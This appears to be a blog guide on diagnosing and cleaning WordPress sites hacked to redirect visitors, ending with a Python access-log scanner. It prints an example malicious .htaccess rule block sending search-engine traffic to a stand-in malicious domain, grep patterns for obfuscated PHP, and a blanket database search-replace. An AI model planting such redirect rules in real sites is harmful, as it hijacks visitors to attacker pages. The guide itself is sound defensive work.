Finding your WordPress site redirecting users to suspicious gambling sites or "congratulations" pop-ups is a nightmare for any admin. Beyond the immediate SEO penalty and Chrome "Red Screen" warnings, these infections often involve sophisticated obfuscation that standard security plugins might miss.
As someone who has spent years in the trenches of WAF (Web Application Firewall) management and incident response, I have watched this pattern evolve from simple header injections to complex, multi-stage PHP backdoors. Here is how to diagnose and fix a WordPress hacked redirect in a structured way.
1. Trace the Redirect Chain
Before touching any code, identify how the redirect is triggered. Attackers often use conditional logic to hide from admins:
- User-Agent Filtering: The redirect only happens for mobile users or specific browsers
- Referrer Checking: It only triggers when a user clicks through from Google or Bing
- Cookie Tracking: It only happens once per IP
Use curl to inspect the response headers without executing any malicious scripts (-I sends a HEAD request; if nothing shows up, repeat without -I, since some injected code only fires on a GET, and add -e 'https://www.google.com/' to simulate a search-engine referrer):
curl -I -L -A "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X)" https://yourwebsite.com
Look for Location: headers or window.location.href in the HTML body.
2. The Usual Suspects: Where the Malware Lurks
.htaccess Hijack
The most common entry point for redirects is the .htaccess file. Attackers append rules that intercept requests before WordPress loads.
Example:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ http://malicious-domain.com/bad-script.php [R=301,L]
Database Injection (wp_options)
Search your wp_options table for:
- siteurl
- home
- autoloaded entries
Look for:
- <script> tags
- eval(base64_decode(...))
Attackers often hook into wp_head or wp_footer.
Theme and Plugin Core Files
Check functions.php in your active theme. Look for unexpected hooks such as add_action('wp_head', ...).
Search for suspicious patterns across wp-content (use -rn rather than -rnw: the whole-word flag rejects 'eval(' when a letter follows the parenthesis, as in eval(base64_decode(...)), so the most common form is missed):
grep -rn './wp-content/' -e 'eval('
grep -rn './wp-content/' -e 'base64_decode'
grep -rn './wp-content/' -e 'str_rot13'
3. Systematic Cleanup Process
Isolate and Backup
- Put the site in maintenance mode
- Take a full backup (files and database)
Core Reinstallation
- Delete everything except:
  - wp-content
  - wp-config.php
- Reinstall a clean WordPress core
Verify wp-config.php
- Check for code before <?php
- Check for injected code at the end
- Refresh security salts
Audit Plugins and Themes
- Remove all inactive plugins and themes
- For active ones:
  - Delete directories
  - Reinstall clean versions
Clean the Database
- Inspect wp_posts and wp_options
- Remove injected <script> tags
Example (run it with --dry-run first to preview the affected rows; this blanket pattern strips every opening <script tag, legitimate ones included, so narrow it to the injected markup you actually found):
wp search-replace '<script' ''
4. Hardening for the Future
Fixing the redirect is only half the problem; the entry point must be closed.
File Permissions
- Directories: 755
- Files: 644
- wp-config.php: 400 or 440
Disable File Editing
Add to wp-config.php:
define('DISALLOW_FILE_EDIT', true);
Implement a Reverse Proxy WAF
Local security plugins run inside the compromised environment. A reverse proxy WAF operates outside it and filters:
- SQL injection attempts
- Remote code execution payloads
- Automated scanners
Monitor Access Logs
Look for:
- POST requests to unusual .php files
- Activity in wp-content/uploads
These are typical indicators of webshell execution.
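As an added example (not code from the original post), here is a small Python scanner that applies those two indicators to combined-format access log lines. The sample lines and the set of endpoints that legitimately accept POSTs on a stock install are constructed assumptions, and "activity in uploads" is narrowed to requests for .php files there, since image hits under uploads are normal.

```python
import re
from urllib.parse import urlparse

# Combined log format: ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoints that take POSTs on a stock WordPress install (assumption; extend for your plugins).
EXPECTED_POST_PATHS = {
    "/wp-login.php", "/wp-cron.php", "/wp-comments-post.php", "/xmlrpc.php",
    "/wp-admin/admin-ajax.php", "/wp-admin/admin-post.php", "/wp-admin/post.php",
    "/wp-admin/async-upload.php",
}

# Constructed sample lines (RFC 5737 test addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2024:10:01:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:10:02:30 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 51 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:10:03:11 +0000] "GET /wp-content/uploads/2024/03/photo.jpg HTTP/1.1" 200 80213 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:10:04:45 +0000] "POST /wp-content/uploads/2024/03/cache.php HTTP/1.1" 200 312 "-" "python-requests/2.31"',
    '198.51.100.7 - - [10/Mar/2024:10:05:02 +0000] "POST /wp-includes/css/.wp-tmp.php HTTP/1.1" 200 44 "-" "python-requests/2.31"',
]

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not combined format (or a truncated line)
    entry = m.groupdict()
    entry["path"] = urlparse(entry["target"]).path  # drop the query string before matching
    entry["status"] = int(entry["status"])
    return entry

def suspicious_reasons(entry):
    # The two indicators from the post: PHP under uploads/, and POSTs to endpoints that should not take them.
    path, reasons = entry["path"], []
    if path.startswith("/wp-content/uploads/") and path.endswith(".php"):
        reasons.append("php_in_uploads")
    if entry["method"] == "POST" and path.endswith(".php") and path not in EXPECTED_POST_PATHS:
        reasons.append("post_to_unusual_php")
    return reasons

def scan(lines):
    """Return (ip, method, path, status, reasons) for every flagged line, in log order."""
    findings = []
    for entry in filter(None, map(parse_line, lines)):
        reasons = suspicious_reasons(entry)
        if reasons:
            findings.append((entry["ip"], entry["method"], entry["path"], entry["status"], reasons))
    return findings
```

Run it over your real access log with `scan(open("access.log"))`; a 200 status on a flagged line means the file exists and executed, which is the case to chase first.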
Conclusion
A hacked redirect is usually a symptom of:
- Outdated plugins or themes
- Weak credentials
Manual cleanup removes the immediate issue. Long-term stability depends on:
- Continuous patching
- Traffic filtering
- Log monitoring
Security here is an ongoing process, not a one-time fix.